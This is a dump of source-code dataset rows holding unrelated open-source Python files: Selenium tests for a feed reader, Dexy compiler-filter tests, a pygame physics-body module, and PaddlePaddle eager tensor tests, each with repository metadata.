self.browser.get(self.live_server_url + "/current")
entry_1_title = [entry.text for entry in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__title")))][0]
entries_titles_from_current_page = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertIn(entry_1_title, entries_titles_from_current_page)
entry_1_currently_reading_button = self.browser.find_elements_by_class_name("entry__currently_reading__btn")[0]
entry_1_currently_reading_button.click()
entries_titles = self.wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, ".entry__title")))
self.assertEqual(True, entries_titles)
# The user visits the homepage and sees it
self.browser.get(self.live_server_url)
entries_titles = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertIn(entry_1_title, entries_titles)
def test_can_set_things_to_currently_reading_and_not_currently_reading_on_latest_page(self, func_1, func_2):
# ENSURE THEY ARE ALWAYS LATEST
entry = Entry.objects.first()
entry.published = datetime.datetime.now()
entry.save()
# The user will open the web page to the homepage
self.browser.get(self.live_server_url)
# The user will open the web page to the homepage
self.browser.get(self.live_server_url+'/latest/')
self.wait.until(EC.text_to_be_present_in_element((By.CSS_SELECTOR, ".main-title"), "Latest"))
# The user will mark an item as currently reading
entry_1_title = self.wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, ".entry__title")))
entry_1_title = entry_1_title.text
entry_1_currently_reading_button = self.wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, ".entry__currently_reading__btn")))
entry_1_currently_reading_button.click()
# That item will disappear from the page
is_entry_gone = self.wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, ".entry__title")))
self.assertEqual(is_entry_gone, True)
# The user will then go to the current page and see their item
self.browser.get(self.live_server_url + "/current")
entry_1_title = [entry.text for entry in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__title"))) ][0]
entries_titles_from_current_page = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertIn(entry_1_title, entries_titles_from_current_page)
# The user then decides they want to remove the item from their currently reading list
entry_1_currently_reading_button = self.browser.find_elements_by_class_name("entry__currently_reading__btn")[0]
entry_1_currently_reading_button.click()
# The user no longer sees the item there
entries_titles = self.wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, ".entry__title")))
# if True then it's invisible
self.assertEqual(True, entries_titles)
self.browser.get(self.live_server_url +'/latest')
entries_titles = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertIn(entry_1_title, entries_titles)
def test_can_mark_items_as_read_and_unread(self, func_1, func_2):
self.browser.get(self.live_server_url)
entry_1_mark_reading_btn = self.browser.find_elements_by_class_name("entry__seen-unseen__btn")[0]
entry_1_mark_reading_btn.click()
entry_1_mark_reading_btn = self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__seen-unseen__btn")))[0]
self.assertNotIn("entry__seen-unseen__btn--unread", entry_1_mark_reading_btn.get_attribute("class"))
entry_1_mark_reading_btn.click()
entry_1_mark_reading_btn = self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__seen-unseen__btn")))[0]
self.assertIn("entry__seen-unseen__btn--unread", entry_1_mark_reading_btn.get_attribute("class"))
def test_can_delete_subscription(self, func_1, func_2):
self.browser.get(self.live_server_url)
subscriptions = [sub.text for sub in self.browser.find_elements_by_class_name("subscription")]
self.assertEqual(len(subscriptions), 1)
subscription_delete_btn = self.browser.find_element_by_class_name("subscription__delete")
subscription_delete_btn.click()
self.assertEqual(True, self.wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, ".subscription"))))
self.assertEqual([], self.browser.find_elements_by_class_name("entry__title")) | true | true |
f726084efad0da3d822f2612ca1c35a8e0a06715 | 2,932 | py | Python | tests/plugins/test_clang_filters.py | dsoto/dexy | 0f2090250040c3c54c8481a16de8e476b559e87c | [
"MIT"
] | null | null | null | tests/plugins/test_clang_filters.py | dsoto/dexy | 0f2090250040c3c54c8481a16de8e476b559e87c | [
"MIT"
] | null | null | null | tests/plugins/test_clang_filters.py | dsoto/dexy | 0f2090250040c3c54c8481a16de8e476b559e87c | [
"MIT"
] | null | null | null | from tests.utils import assert_output
from tests.utils import wrap
from dexy.doc import Doc
FORTRAN_HELLO_WORLD = """program hello
print *, "Hello World!"
end program hello
"""
CPP_HELLO_WORLD = """#include <iostream>
using namespace std;
int main()
{
cout << "Hello, world!";
return 0;
}
"""
C_HELLO_WORLD = """#include <stdio.h>
int main()
{
printf("HELLO, world\\n");
}
"""
C_FUSSY_HELLO_WORLD = """#include <stdio.h>
int main()
{
printf("HELLO, world\\n");
return 0;
}
"""
C_WITH_INPUT = """#include <stdio.h>
int main()
{
int c;
c = getchar();
while (c != EOF) {
putchar(c);
c = getchar();
}
}
"""
def test_fortran_filter():
assert_output('fortran', FORTRAN_HELLO_WORLD, "Hello, world!", ext=".f")
def test_cpp_filter():
assert_output('cpp', CPP_HELLO_WORLD, "Hello, world!", ext=".cpp")
def test_clang_filter():
assert_output('clang', C_HELLO_WORLD, "HELLO, world\n", ext=".c")
def test_c_filter():
assert_output('gcc', C_HELLO_WORLD, "HELLO, world\n", ext=".c")
assert_output('gcc', C_FUSSY_HELLO_WORLD, "HELLO, world\n", ext=".c")
def test_cfussy_filter():
assert_output('cfussy', C_FUSSY_HELLO_WORLD, "HELLO, world\n", ext=".c")
with wrap() as wrapper:
wrapper.debug = False
doc = Doc("hello.c|cfussy",
contents=C_HELLO_WORLD,
wrapper=wrapper)
wrapper.run_docs(doc)
assert wrapper.state == 'error'
def test_c_input():
with wrap() as wrapper:
node = Doc("copy.c|cinput",
inputs = [
Doc("input.txt",
contents = "hello, c",
wrapper=wrapper)
],
contents = C_WITH_INPUT,
wrapper=wrapper)
wrapper.run_docs(node)
assert str(node.output_data()) == "hello, c"
def test_clang_input():
with wrap() as wrapper:
node = Doc("copy.c|clanginput",
inputs = [
Doc("input.txt",
contents = "hello, c",
wrapper=wrapper)
],
contents = C_WITH_INPUT,
wrapper=wrapper)
wrapper.run_docs(node)
assert str(node.output_data()) == "hello, c"
def test_clang_multiple_inputs():
with wrap() as wrapper:
node = Doc("copy.c|clanginput",
inputs = [
Doc("input1.txt",
contents = "hello, c",
wrapper=wrapper),
Doc("input2.txt",
contents = "more data",
wrapper=wrapper)
],
contents = C_WITH_INPUT,
wrapper=wrapper)
wrapper.run_docs(node)
assert unicode(node.output_data()['input1.txt']) == u'hello, c'
assert unicode(node.output_data()['input2.txt']) == u'more data'
| 24.433333 | 76 | 0.537517 | from tests.utils import assert_output
from tests.utils import wrap
from dexy.doc import Doc
FORTRAN_HELLO_WORLD = """program hello
print *, "Hello World!"
end program hello
"""
CPP_HELLO_WORLD = """#include <iostream>
using namespace std;
int main()
{
cout << "Hello, world!";
return 0;
}
"""
C_HELLO_WORLD = """#include <stdio.h>
int main()
{
printf("HELLO, world\\n");
}
"""
C_FUSSY_HELLO_WORLD = """#include <stdio.h>
int main()
{
printf("HELLO, world\\n");
return 0;
}
"""
C_WITH_INPUT = """#include <stdio.h>
int main()
{
int c;
c = getchar();
while (c != EOF) {
putchar(c);
c = getchar();
}
}
"""
def test_fortran_filter():
assert_output('fortran', FORTRAN_HELLO_WORLD, "Hello, world!", ext=".f")
def test_cpp_filter():
assert_output('cpp', CPP_HELLO_WORLD, "Hello, world!", ext=".cpp")
def test_clang_filter():
assert_output('clang', C_HELLO_WORLD, "HELLO, world\n", ext=".c")
def test_c_filter():
assert_output('gcc', C_HELLO_WORLD, "HELLO, world\n", ext=".c")
assert_output('gcc', C_FUSSY_HELLO_WORLD, "HELLO, world\n", ext=".c")
def test_cfussy_filter():
assert_output('cfussy', C_FUSSY_HELLO_WORLD, "HELLO, world\n", ext=".c")
with wrap() as wrapper:
wrapper.debug = False
doc = Doc("hello.c|cfussy",
contents=C_HELLO_WORLD,
wrapper=wrapper)
wrapper.run_docs(doc)
assert wrapper.state == 'error'
def test_c_input():
with wrap() as wrapper:
node = Doc("copy.c|cinput",
inputs = [
Doc("input.txt",
contents = "hello, c",
wrapper=wrapper)
],
contents = C_WITH_INPUT,
wrapper=wrapper)
wrapper.run_docs(node)
assert str(node.output_data()) == "hello, c"
def test_clang_input():
with wrap() as wrapper:
node = Doc("copy.c|clanginput",
inputs = [
Doc("input.txt",
contents = "hello, c",
wrapper=wrapper)
],
contents = C_WITH_INPUT,
wrapper=wrapper)
wrapper.run_docs(node)
assert str(node.output_data()) == "hello, c"
def test_clang_multiple_inputs():
with wrap() as wrapper:
node = Doc("copy.c|clanginput",
inputs = [
Doc("input1.txt",
contents = "hello, c",
wrapper=wrapper),
Doc("input2.txt",
contents = "more data",
wrapper=wrapper)
],
contents = C_WITH_INPUT,
wrapper=wrapper)
wrapper.run_docs(node)
assert unicode(node.output_data()['input1.txt']) == u'hello, c'
assert unicode(node.output_data()['input2.txt']) == u'more data'
| true | true |
f72608bcf3958c08d167921ea51ff86f7896570c | 10,372 | py | Python | pygame_geometry/body.py | MarcPartensky/Pygame-Geometry | 61abbbeac0fd351253e06b19736d9939fd5b316e | [
"MIT"
] | 3 | 2021-01-03T18:13:02.000Z | 2021-06-27T21:29:11.000Z | pygame_geometry/body.py | MarcPartensky/Pygame-Geometry | 61abbbeac0fd351253e06b19736d9939fd5b316e | [
"MIT"
] | null | null | null | pygame_geometry/body.py | MarcPartensky/Pygame-Geometry | 61abbbeac0fd351253e06b19736d9939fd5b316e | [
"MIT"
] | null | null | null | from .abstract import Vector, Point, Segment, Circle
from .anatomies import FormAnatomy
from .motion import Motion, Moment
from .material import Material
from .physics import Physics
from . import colors
from pygame.locals import *
from copy import deepcopy
import pygame
import logging
import copy
import random
import math
# Interface Anatomy
# - show(context) //an anatomy must be responsible for drawing itself
# - __str__() //an anatomy must be able to give a string representation
# - __contains__(point) //an anatomy must be able to tell if a point is in it
# - cross(anatomy) //an anatomy must be able to determine if it is crossing another anatomy
# - recenter()
# - update()
# . center //an anatomy must have a center
# image, segment and form implement anatomy
class Image(Rect):
def __init__(self, filename):
"""Create an image."""
self.surface = pygame.load.image(filename)
def show(self, context):
""""Show the image on the window."""
self.context.draw.blit(self.surface)
class Body(Physics):
@classmethod
def random(cls, n=5, d=2, nm=2, nv=3, borns=[-1, 1]):
"""Create a random body."""
anatomy = FormAnatomy.random(n=n, d=d, borns=borns)
anatomy.recenter(anatomy.centroid)
motions = []
if nm >= 1:
motions.append(Motion.random(n=nv, d=d))
if nm >= 2:
motions.append(Moment.random(n=nv, d=d))
if nm >= 3:
motions.extend([Motion.random(n=nv, d=d) for i in range(nm - 2)])
return cls(anatomy, motions)
@classmethod
def createFromForm(cls, anatomy, motion=Motion(), moment=Moment()):
"""Create a body from an absolute form using its motion and its angular moment."""
motion.position = Vector(*anatomy.center)
anatomy.points = (-motion.position).applyToPoints(anatomy.points)
return cls(anatomy, [motion, moment])
@classmethod
def createFromMotionMoment(cls, anatomy, motion=Motion(), moment=Moment()):
"""Create a body from a relative anatomy, a motion and a moment."""
return cls(anatomy, [motion, moment])
@classmethod
def createFromRandomMotions(cls, anatomy, n=2):
"""Create a body using an anatomy and giving it 'n' random motions."""
motions = []
if n >= 1:
motions.append(Motion.random())
if n >= 2:
motions.append(Moment.random())
if n >= 3:
motions.extend([Motion.random() for i in range(n - 2)])
return cls(anatomy, motions)
def __init__(self, anatomy, motions):
"""Create body using its anatomy, its motion and its angular moment."""
self.anatomy = anatomy
if not isinstance(motions, list):
raise TypeError("Wrong motions: "+str(motions))
super().__init__(motions)
def __str__(self):
"""Return the string representation of the body."""
return type(self).__name__[0].lower() + "(" + str(self.form) + "," + ",".join(map(str, self.motions)) + ")"
def show(self, context):
"""Show the form on the window."""
self.form.show(context)
def showMotion(self, context):
"""Show the motion of the body."""
self.motion.show(context)
def showMoment(self, context):
"""Show the moment of the body from its farthest point."""
form = self.form
position = self.position
distances = [(Segment(p, position).length, p) for p in form.points]
farthest = max(distances, key=lambda c: c[0])[1]
angle = Vector.createFromTwoPoints(position, farthest).angle
self.moment.show(context, farthest, angle)
def showAll(self, context):
"""Show the body and its motions."""
self.show(context)
self.showMotion(context)
self.showMoment(context)
self.showBorn(context)
def showBorn(self, context):
"""Show the born circle of the entity."""
self.getCircle().show(context)
def update(self, dt=1):
"""Update the motions of the body using 'dt'."""
for motion in self.motions:
motion.update(dt)
def updateFriction(self, friction=0.1):
"""Update the frictions of the body using the 'friction'."""
for motion in self.motions:
motion.velocity.norm *= (1 - friction)
def recenter(self):
"""Set the center of the relative anatomy on the origin."""
c = self.anatomy.center
v = -Vector(*c)
self.anatomy.position.set(v)
def getForm(self):
"""Return a copy of the form in absolute coordinates."""
form = copy.deepcopy(self.anatomy)
form.center = Point(*self.motion.position)
if len(self.motions) == 1: # Ugly fix for general case
form.rotate(self.velocity.angle)
else:
form.rotate(self.moment.position.norm)
return form
def setForm(self, form):
"""Set the form of the body using the absolute form."""
self.position.set(Vector(*form.center))
self.anatomy = form.center
form = absolute = property(getForm, setForm)
def __contains__(self, point):
"""Determine if a point is in the body."""
return point in self.form
def react(self, event):
"""React to a given event by making an action."""
pass
def follow(self, point):
"""Update the motion in order for a body to follow a given point."""
position = Vector(*point)
v = position - self.position
self.acceleration.set(v)
def getCenter(self):
"""Return the center."""
return Point(*self.position)
def setCenter(self, center):
"""Set the new center."""
self.position.set(Vector(*center))
center = property(getCenter, setCenter)
def cross(self, other):
"""Determine if the body is crossing with the other body."""
return self.form.cross(other.form)
def collide(self, other):
return self.form.collide(other.form)
def __xor__(self, other):
"""Determine if the body is crossing with the other body using xor method."""
return self.form | other.form
def getPoints(self):
"""Return the points of the form of the body."""
return self.form.points
def setPoints(self, points):
"""Set the points of the form of the body."""
self.form.points = points
points = property(getPoints, setPoints)
def getBorn(self):
return self.anatomy.born
def setBorn(self, born):
self.anatomy.born = born
born = property(getBorn, setBorn)
def getCircle(self):
"""Return the circle that born the body."""
return Circle(*self.position, radius=self.born)
def spread(self, n):
"""Take away the entity by multiplying the norm of the position by n."""
self.position.norm *= n
def enlarge(self, n):
"""Enlarge the anatomy."""
self.anatomy.enlarge(n)
class FrictionBody(Body):
"""Add some friction to a body."""
def __init__(self, *args, friction=0.1):
"""Create a body with friction."""
super().__init__(*args)
self.friction = friction
def update(self, dt):
"""Update the spaceship."""
super().update(dt)
self.updateFriction()
def updateFriction(self):
"""Add some friction."""
self.velocity.norm *= (1 - self.friction)
class MaterialBody(Material):
"""Unlike the other bodies, the material body only has one motion."""
def __init__(self, anatomy, motion):
"""Create a material body from its anatomy and its motion."""
self.anatomy = anatomy
self.motion = motion
@classmethod
def createFromAbsolute(cls, absolute, motion):
"""Create a simple body from its absolute anatomy and its motion."""
return cls(anatomy, motion)
@classmethod
def random(cls, nv=2, d=2):
"""Return a random simple body."""
motion = Motion.random(n=nv, d=d)
anatomy = Form.random(n=5)
return cls(anatomy, motion)
def __init__(self, anatomy, motion):
"""Create a simple body."""
self.motion = motion
self.anatomy = anatomy
self.center()
def __str__(self):
"""Return the string representation of the body."""
return "mb(" + str(self.anatomy) + "," + str(",".join(map(str, self.motion))) + ")"
def center(self):
"""Center the anatomy."""
c = self.anatomy.center
v = -Vector(*c)
self.anatomy.position.set(v)
def show(self, context):
"""Show the simple body on the context."""
self.showAbsolute(context)
self.showMotion(context)
def showAnatomy(self, context):
"""Show the anatomy on the context."""
self.anatomy.show(context)
def showAbsolute(self, context):
"""Show the body on the context."""
self.getAbsolute().show(context)
def showMotion(self, context):
"""Show the motion of the body on the context."""
self.velocity.show(context, self.position)
self.acceleration.show(context, self.position)
def update(self, dt=1):
"""Update the simple body."""
self.motion.update(dt)
def follow(self, position):
"""Follow the cursor."""
a = Vector(*position)
b = self.position
v = Vector(a - b)
self.velocity.angle = v.angle
# self.velocity.norm=min(v.norm,1)
def __contains__(self, other):
"""Determine if the object other is in the absolute anatomy."""
return other in self.getAbsolute()
def getAbsolute(self):
"""Return the absolute anatomy of the body which means its form after
changing the position depending on its motion."""
anatomy = deepcopy(self.anatomy)
anatomy.position = self.motion.position # change its position
anatomy.rotate(self.velocity.angle) # change its rotation
return anatomy
absolute = property(getAbsolute)
class BornShowingBody(Body):
def show(self, context):
super().show(context)
self.showBorn(context)
if __name__ == "__main__":
from .manager import BodyManager
b = BornShowingBody.random()
m = BodyManager(b)
m()
| 31.621951 | 115 | 0.614153 | from .abstract import Vector, Point, Segment, Circle
from .anatomies import FormAnatomy
from .motion import Motion, Moment
from .material import Material
from .physics import Physics
from . import colors
from pygame.locals import *
from copy import deepcopy
import pygame
import logging
import copy
import random
import math
class Image(Rect):
def __init__(self, filename):
self.surface = pygame.load.image(filename)
def show(self, context):
self.context.draw.blit(self.surface)
class Body(Physics):
@classmethod
def random(cls, n=5, d=2, nm=2, nv=3, borns=[-1, 1]):
anatomy = FormAnatomy.random(n=n, d=d, borns=borns)
anatomy.recenter(anatomy.centroid)
motions = []
if nm >= 1:
motions.append(Motion.random(n=nv, d=d))
if nm >= 2:
motions.append(Moment.random(n=nv, d=d))
if nm >= 3:
motions.extend([Motion.random(n=nv, d=d) for i in range(nm - 2)])
return cls(anatomy, motions)
@classmethod
def createFromForm(cls, anatomy, motion=Motion(), moment=Moment()):
motion.position = Vector(*anatomy.center)
anatomy.points = (-motion.position).applyToPoints(anatomy.points)
return cls(anatomy, [motion, moment])
@classmethod
def createFromMotionMoment(cls, anatomy, motion=Motion(), moment=Moment()):
return cls(anatomy, [motion, moment])
@classmethod
def createFromRandomMotions(cls, anatomy, n=2):
motions = []
if n >= 1:
motions.append(Motion.random())
if n >= 2:
motions.append(Moment.random())
if n >= 3:
motions.extend([Motion.random() for i in range(n - 2)])
return cls(anatomy, motions)
def __init__(self, anatomy, motions):
self.anatomy = anatomy
if not isinstance(motions, list):
raise TypeError("Wrong motions: "+str(motions))
super().__init__(motions)
def __str__(self):
return type(self).__name__[0].lower() + "(" + str(self.form) + "," + ",".join(map(str, self.motions)) + ")"
def show(self, context):
self.form.show(context)
def showMotion(self, context):
self.motion.show(context)
def showMoment(self, context):
form = self.form
position = self.position
distances = [(Segment(p, position).length, p) for p in form.points]
farthest = max(distances, key=lambda c: c[0])[1]
angle = Vector.createFromTwoPoints(position, farthest).angle
self.moment.show(context, farthest, angle)
def showAll(self, context):
self.show(context)
self.showMotion(context)
self.showMoment(context)
self.showBorn(context)
def showBorn(self, context):
self.getCircle().show(context)
def update(self, dt=1):
for motion in self.motions:
motion.update(dt)
def updateFriction(self, friction=0.1):
for motion in self.motions:
motion.velocity.norm *= (1 - friction)
def recenter(self):
c = self.anatomy.center
v = -Vector(*c)
self.anatomy.position.set(v)
def getForm(self):
form = copy.deepcopy(self.anatomy)
form.center = Point(*self.motion.position)
if len(self.motions) == 1:
form.rotate(self.velocity.angle)
else:
form.rotate(self.moment.position.norm)
return form
def setForm(self, form):
self.position.set(Vector(*form.center))
self.anatomy = form.center
form = absolute = property(getForm, setForm)
def __contains__(self, point):
return point in self.form
def react(self, event):
pass
def follow(self, point):
position = Vector(*point)
v = position - self.position
self.acceleration.set(v)
def getCenter(self):
return Point(*self.position)
def setCenter(self, center):
self.position.set(Vector(*center))
center = property(getCenter, setCenter)
def cross(self, other):
return self.form.cross(other.form)
def collide(self, other):
return self.form.collide(other.form)
def __xor__(self, other):
return self.form | other.form
def getPoints(self):
return self.form.points
def setPoints(self, points):
self.form.points = points
points = property(getPoints, setPoints)
def getBorn(self):
return self.anatomy.born
def setBorn(self, born):
self.anatomy.born = born
born = property(getBorn, setBorn)
def getCircle(self):
return Circle(*self.position, radius=self.born)
def spread(self, n):
self.position.norm *= n
def enlarge(self, n):
self.anatomy.enlarge(n)
class FrictionBody(Body):
def __init__(self, *args, friction=0.1):
super().__init__(*args)
self.friction = friction
def update(self, dt):
super().update(dt)
self.updateFriction()
def updateFriction(self):
self.velocity.norm *= (1 - self.friction)
class MaterialBody(Material):
def __init__(self, anatomy, motion):
self.anatomy = anatomy
self.motion = motion
@classmethod
def createFromAbsolute(cls, absolute, motion):
return cls(anatomy, motion)
@classmethod
def random(cls, nv=2, d=2):
motion = Motion.random(n=nv, d=d)
anatomy = Form.random(n=5)
return cls(anatomy, motion)
def __init__(self, anatomy, motion):
self.motion = motion
self.anatomy = anatomy
self.center()
def __str__(self):
return "mb(" + str(self.anatomy) + "," + str(",".join(map(str, self.motion))) + ")"
def center(self):
c = self.anatomy.center
v = -Vector(*c)
self.anatomy.position.set(v)
def show(self, context):
self.showAbsolute(context)
self.showMotion(context)
def showAnatomy(self, context):
self.anatomy.show(context)
def showAbsolute(self, context):
self.getAbsolute().show(context)
def showMotion(self, context):
self.velocity.show(context, self.position)
self.acceleration.show(context, self.position)
def update(self, dt=1):
self.motion.update(dt)
def follow(self, position):
a = Vector(*position)
b = self.position
v = Vector(a - b)
self.velocity.angle = v.angle
def __contains__(self, other):
return other in self.getAbsolute()
def getAbsolute(self):
anatomy = deepcopy(self.anatomy)
anatomy.position = self.motion.position
anatomy.rotate(self.velocity.angle)
return anatomy
absolute = property(getAbsolute)
class BornShowingBody(Body):
def show(self, context):
super().show(context)
self.showBorn(context)
if __name__ == "__main__":
from .manager import BodyManager
b = BornShowingBody.random()
m = BodyManager(b)
m()
| true | true |
f7260982ff15ee479d978bf2768b0d3f1e8c015c | 22,456 | py | Python | python/paddle/fluid/tests/unittests/test_egr_python_api.py | tangzhiyi11/Paddle | 790cadd1f06fabeadc4b9aeca5622ea50985b990 | [
"Apache-2.0"
] | 1 | 2021-12-31T09:01:02.000Z | 2021-12-31T09:01:02.000Z | python/paddle/fluid/tests/unittests/test_egr_python_api.py | tangzhiyi11/Paddle | 790cadd1f06fabeadc4b9aeca5622ea50985b990 | [
"Apache-2.0"
] | null | null | null | python/paddle/fluid/tests/unittests/test_egr_python_api.py | tangzhiyi11/Paddle | 790cadd1f06fabeadc4b9aeca5622ea50985b990 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle.fluid.core as core
import paddle.fluid.eager.eager_tensor_patch_methods as eager_tensor_patch_methods
import paddle
import numpy as np
from paddle.fluid.framework import _test_eager_guard, EagerParamBase, _in_eager_mode
from paddle.fluid.data_feeder import convert_dtype
import unittest
import copy
class EagerScaleTestCase(unittest.TestCase):
def test_scale_base(self):
with _test_eager_guard():
paddle.set_device("cpu")
arr = np.ones([4, 16, 16, 32]).astype('float32')
tensor = paddle.to_tensor(arr, 'float32', core.CPUPlace())
print(tensor)
tensor = core.eager.scale(tensor, 2.0, 0.9, True, False)
for i in range(0, 100):
tensor = core.eager.scale(tensor, 2.0, 0.9, True, False)
print(tensor)
self.assertEqual(tensor.shape, [4, 16, 16, 32])
self.assertEqual(tensor.stop_gradient, True)
def test_retain_grad_and_run_backward(self):
with _test_eager_guard():
paddle.set_device("cpu")
input_data = np.ones([4, 16, 16, 32]).astype('float32')
data_eager = paddle.to_tensor(input_data, 'float32',
core.CPUPlace(), False)
grad_data = np.ones([4, 16, 16, 32]).astype('float32')
grad_eager = paddle.to_tensor(grad_data, 'float32', core.CPUPlace())
data_eager.retain_grads()
out_eager = core.eager.scale(data_eager, 1.0, 0.9, True, True)
self.assertFalse(data_eager.grad._is_initialized())
out_eager.backward(grad_eager, False)
self.assertTrue(data_eager.grad._is_initialized())
self.assertTrue(np.array_equal(data_eager.grad.numpy(), input_data))
def test_retain_grad_and_run_backward_raises(self):
with _test_eager_guard():
paddle.set_device("cpu")
input_data = np.ones([4, 16, 16, 32]).astype('float32')
data_eager = paddle.to_tensor(input_data, 'float32',
core.CPUPlace(), False)
grad_data = np.ones([4, 16, 16, 32]).astype('float32')
grad_data2 = np.ones([4, 16]).astype('float32')
grad_eager = paddle.to_tensor(grad_data, 'float32', core.CPUPlace())
grad_eager2 = paddle.to_tensor(grad_data2, 'float32',
core.CPUPlace())
data_eager.retain_grads()
out_eager = core.eager.scale(data_eager, 1.0, 0.9, True, True)
self.assertFalse(data_eager.grad._is_initialized())
with self.assertRaisesRegexp(
AssertionError,
"The type of grad_tensor must be paddle.Tensor"):
out_eager.backward(grad_data, False)
with self.assertRaisesRegexp(
AssertionError,
"Tensor shape not match, Tensor of grad_tensor /*"):
out_eager.backward(grad_eager2, False)
class EagerDtypeTestCase(unittest.TestCase):
def check_to_tesnsor_and_numpy(self, dtype, proto_dtype):
with _test_eager_guard():
arr = np.random.random([4, 16, 16, 32]).astype(dtype)
tensor = paddle.to_tensor(arr, dtype)
self.assertEqual(tensor.dtype, proto_dtype)
self.assertTrue(np.array_equal(arr, tensor.numpy()))
def test_dtype_base(self):
print("Test_dtype")
self.check_to_tesnsor_and_numpy('bool', core.VarDesc.VarType.BOOL)
self.check_to_tesnsor_and_numpy('int8', core.VarDesc.VarType.INT8)
self.check_to_tesnsor_and_numpy('uint8', core.VarDesc.VarType.UINT8)
self.check_to_tesnsor_and_numpy('int16', core.VarDesc.VarType.INT16)
self.check_to_tesnsor_and_numpy('int32', core.VarDesc.VarType.INT32)
self.check_to_tesnsor_and_numpy('int64', core.VarDesc.VarType.INT64)
self.check_to_tesnsor_and_numpy('float16', core.VarDesc.VarType.FP16)
self.check_to_tesnsor_and_numpy('float32', core.VarDesc.VarType.FP32)
self.check_to_tesnsor_and_numpy('float64', core.VarDesc.VarType.FP64)
self.check_to_tesnsor_and_numpy('complex64',
core.VarDesc.VarType.COMPLEX64)
self.check_to_tesnsor_and_numpy('complex128',
core.VarDesc.VarType.COMPLEX128)
class EagerTensorPropertiesTestCase(unittest.TestCase):
def constructor(self, place):
egr_tensor = core.eager.EagerTensor()
self.assertEqual(egr_tensor.persistable, False)
self.assertTrue("generated" in egr_tensor.name)
self.assertEqual(egr_tensor.shape, [])
self.assertEqual(egr_tensor.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor.stop_gradient, True)
egr_tensor0 = core.eager.EagerTensor(
core.VarDesc.VarType.FP32, [4, 16, 16, 32], "test_eager_tensor",
core.VarDesc.VarType.LOD_TENSOR, True)
self.assertEqual(egr_tensor0.persistable, True)
self.assertEqual(egr_tensor0.name, "test_eager_tensor")
self.assertEqual(egr_tensor0.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor0.dtype, core.VarDesc.VarType.FP32)
arr0 = np.random.rand(4, 16, 16, 32).astype('float32')
egr_tensor1 = core.eager.EagerTensor(arr0, place, True, False,
"numpy_tensor1", False)
self.assertEqual(egr_tensor1.persistable, True)
self.assertEqual(egr_tensor1.name, "numpy_tensor1")
self.assertEqual(egr_tensor1.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor1.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor1.stop_gradient, False)
self.assertTrue(egr_tensor1.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor1.numpy(), arr0))
arr1 = np.random.randint(100, size=(4, 16, 16, 32), dtype=np.int64)
egr_tensor2 = core.eager.EagerTensor(arr1, place, False, True,
"numpy_tensor2", True)
self.assertEqual(egr_tensor2.persistable, False)
self.assertEqual(egr_tensor2.name, "numpy_tensor2")
self.assertEqual(egr_tensor2.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor2.dtype, core.VarDesc.VarType.INT64)
self.assertEqual(egr_tensor2.stop_gradient, True)
self.assertTrue(egr_tensor2.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor2.numpy(), arr1))
arr2 = np.random.rand(4, 16, 16, 32, 64).astype('float32')
egr_tensor3 = core.eager.EagerTensor(arr2)
self.assertEqual(egr_tensor3.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor3.name)
self.assertEqual(egr_tensor3.shape, [4, 16, 16, 32, 64])
self.assertEqual(egr_tensor3.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor3.stop_gradient, True)
self.assertTrue(
egr_tensor3.place._equals(
paddle.fluid.framework._current_expected_place()))
self.assertTrue(np.array_equal(egr_tensor3.numpy(), arr2))
egr_tensor3.stop_gradient = False
egr_tensor4 = core.eager.EagerTensor(egr_tensor3)
self.assertEqual(egr_tensor4.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor4.name)
self.assertEqual(egr_tensor4.shape, egr_tensor3.shape)
self.assertEqual(egr_tensor4.dtype, egr_tensor3.dtype)
self.assertEqual(egr_tensor4.stop_gradient, True)
self.assertTrue(
egr_tensor4.place._equals(
paddle.fluid.framework._current_expected_place()))
self.assertTrue(
np.array_equal(egr_tensor4.numpy(), egr_tensor3.numpy()))
arr4 = np.random.rand(4, 16, 16, 32).astype('float32')
egr_tensor5 = core.eager.EagerTensor(arr4, place)
self.assertEqual(egr_tensor5.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor5.name)
self.assertEqual(egr_tensor5.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor5.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor5.stop_gradient, True)
self.assertTrue(egr_tensor5.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor5.numpy(), arr4))
egr_tensor6 = core.eager.EagerTensor(egr_tensor5, core.CPUPlace())
self.assertEqual(egr_tensor6.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor6.name)
self.assertEqual(egr_tensor6.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor6.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor6.stop_gradient, True)
